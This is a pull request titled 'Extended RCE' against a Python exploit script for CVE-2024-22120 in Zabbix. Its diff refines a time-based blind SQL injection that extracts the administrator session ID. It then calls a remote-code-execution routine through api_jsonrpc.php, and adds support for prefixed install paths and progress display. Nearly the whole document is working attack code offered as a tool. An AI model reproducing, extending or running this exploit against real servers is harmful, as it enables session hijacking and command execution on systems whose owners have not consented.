### PR TITLE
Extended RCE

### DIFF
--- a/CVE-2024-22120-RCE.py
+++ b/CVE-2024-22120-RCE.py
@@ -4,6 +4,10 @@ import requests
 from pwn import *
 from datetime import datetime
 
+RED = '\033[0;31m'
+NC = '\033[0;0m'
+GREEN = '\033[0;32m'
+
 def SendMessage(ip, port, sid, hostid, injection):
     context.log_level = "CRITICAL"
     zbx_header = "ZBXD\x01".encode()
@@ -11,7 +15,7 @@ def SendMessage(ip, port, sid, hostid, injection):
         "request": "command",
         "sid": sid,
         "scriptid": "2",
-        "clientip": "' + " + injection + "+ '",
+        "clientip": "1' + " + injection + "+ '1",
         "hostid": hostid
     }
     message_json = json.dumps(message)
@@ -19,7 +23,7 @@ def SendMessage(ip, port, sid, hostid, injection):
     message = zbx_header + message_length + message_json.encode()
     r = remote(ip, port, level="CRITICAL")
     r.send(message)
-    r.recv(1024)
+    ret = r.recv(1024)
     r.close()
 
 def ExtractAdminSessionId(ip, port, sid, hostid, time_false, time_true):
@@ -28,15 +32,18 @@ def ExtractAdminSessionId(ip, port, sid, hostid, time_false, time_true):
     for i in range(1, token_length+1):
         for c in string.digits + "abcdef":
             before_query = datetime.now().timestamp()
-            query = "(select CASE WHEN (ascii(substr((select sessionid from sessions where userid=1 limit 1),%d,1))=%d) THEN sleep(%d) ELSE sleep(%d) END)" % (i, ord(c), time_true, time_false)
+            query = "(select CASE WHEN (substr((select sessionid from sessions where userid=1 limit 1),%d,1)=\"%c\") THEN sleep(%d) ELSE sleep(%d) END)" % (i, c, time_true, time_false)
             SendMessage(ip, port, sid, hostid, query)
             after_query = datetime.now().timestamp()
+            diff = after_query-before_query
+            print(f"(+) Finding session_id\t sessionid={GREEN}{session_id}{RED}{c}{NC}", end='\r')
             if time_true > (after_query-before_query) > time_false:
                 continue
             else:
                 session_id += c
-                print("(+) session_id=%s" % session_id, flush=True)
+                #print("(+) session_id=%s" % session_id, flush=True)
                 break
+    print(f"(!) sessionid={session_id}")
     return session_id
 
 def GenerateRandomString(length):
@@ -88,8 +95,11 @@ def DeleteScript(url, headers, admin_sessionid, scriptid):
     else:
         return False
 
-def RceExploit(ip, hostid, admin_sessionid):
-    url = f"http://{ip}/api_jsonrpc.php"
+def RceExploit(ip, hostid, admin_sessionid,prefix):
+    if prefix:
+        url = f"http://{ip}/{prefix}/api_jsonrpc.php"
+    else:
+        url = f"http://{ip}/api_jsonrpc.php"
     headers = {
         "content-type": "application/json",
         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
@@ -133,6 +143,7 @@ if __name__ == "__main__":
         parser.add_argument("--port", help="Zabbix server port(default=10051)", default="10051")
         parser.add_argument("--sid", help="Session ID of low privileged user")
         parser.add_argument("--hostid", help="hostid of any host accessible to user with defined sid")
+        parser.add_argument("--prefix", help="Prefix for zabbix site. eg: https://ip/PREFIX/index.php")
         args = parser.parse_args()
         admin_sessionid = ExtractAdminSessionId(args.ip, int(args.port), args.sid, args.hostid, int(args.false_time), int(args.true_time))
-        RceExploit(args.ip, args.hostid, admin_sessionid)
+        RceExploit(args.ip, args.hostid, admin_sessionid,args.prefix)


### PR DESCRIPTION
Set injection to do '1' + (SLEEP(10) + '1' to not generate errors on underlying SQL server
Nicer printing of signing key as it gets generated, (allows users to follow along)
Added functionality to support prefix URLs such as http://127.0.0.1/zabbix/api_jsrpc.php